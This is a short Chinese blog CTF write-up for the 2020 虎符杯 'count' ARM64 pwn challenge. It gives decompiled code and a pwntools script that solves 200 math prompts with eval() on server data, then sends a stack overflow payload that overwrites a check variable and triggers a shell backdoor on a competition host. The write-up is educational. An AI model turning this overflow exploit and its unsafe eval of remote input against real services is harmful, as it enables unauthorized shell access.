HackPluto's Blog

2020 i-春秋 虎符杯 pwn 题解writeup

字数统计: 344阅读时长: 1 min
2020/04/23 Share

上个周末打了两场比赛,记录下虎符杯和西工大校赛的pwn题解,这篇用来记录虎符杯的
虎符杯的pwn最后出了两个题

count

这个题是最简单的一个,一个ARM pwn的入门
漏洞点在这个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
__int64 sub_400990()
{
unsigned int v0; // w0
__int64 v1; // x0
__int64 v2; // x0
__int64 v3; // x0
__int64 v4; // x0
__int64 v6; // [xsp+10h] [xbp+10h]

__int64 v7; // [xsp+78h] [xbp+78h]
int v8; // [xsp+DCh] [xbp+DCh]


int v9; // [xsp+E0h] [xbp+E0h]
int v10; // [xsp+E4h] [xbp+E4h]
int v11; // [xsp+E8h] [xbp+E8h]
int v12; // [xsp+ECh] [xbp+ECh]
int v13; // [xsp+F0h] [xbp+F0h]
int v14; // [xsp+F4h] [xbp+F4h]
unsigned int v15; // [xsp+F8h] [xbp+F8h]
int v16; // [xsp+FCh] [xbp+FCh]

sub_400940();
v16 = 0;
do
{
v0 = time(0LL);
v15 = v0;
v1 = srand(v0);
v2 = (unsigned int)((signed int)rand(v1) % 100);
v14 = v2;
v3 = (unsigned int)((signed int)rand(v2) % 100);
v13 = v3;
v4 = (unsigned int)((signed int)rand(v3) % 100);
v12 = v4;
v11 = (signed int)rand(v4) % 100;
printf("there have 200 levels ~");
printf("Math: %d * %d + %d + %d = ???");
printf("input answer:");
read(0LL, &v6, 20LL);
v10 = v14 * v13 + v12 + v11;
v9 = strtol(&v6, 0LL, 10LL);
if ( v10 != v9 )
{
puts("wrong ");
exit(0LL);
}
puts("good !");
++v16;
}
while ( v16 <= 199 );
v8 = 256;
read(0LL, &v7, 0x6ELL);
if ( v8 == 304305682 )
{
puts("get it ~");
sub_400920();
}
return 0LL;
}

v7存在溢出,可以修改v8的值,从而进入后门函数,get shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

context.log_level = "debug"
context.arch = 'arm64'


p = remote("39.97.210.182",40285)

for i in range(200):
p.recvuntil("there have 200 levels ~Math: ")
data = p.recvuntil("=",True)
ans = eval(data)
p.sendline(str(ans))

payload='A'*100+p64(304305682)
p.send(payload)
p.interactive()

CATALOG
  1. 1. count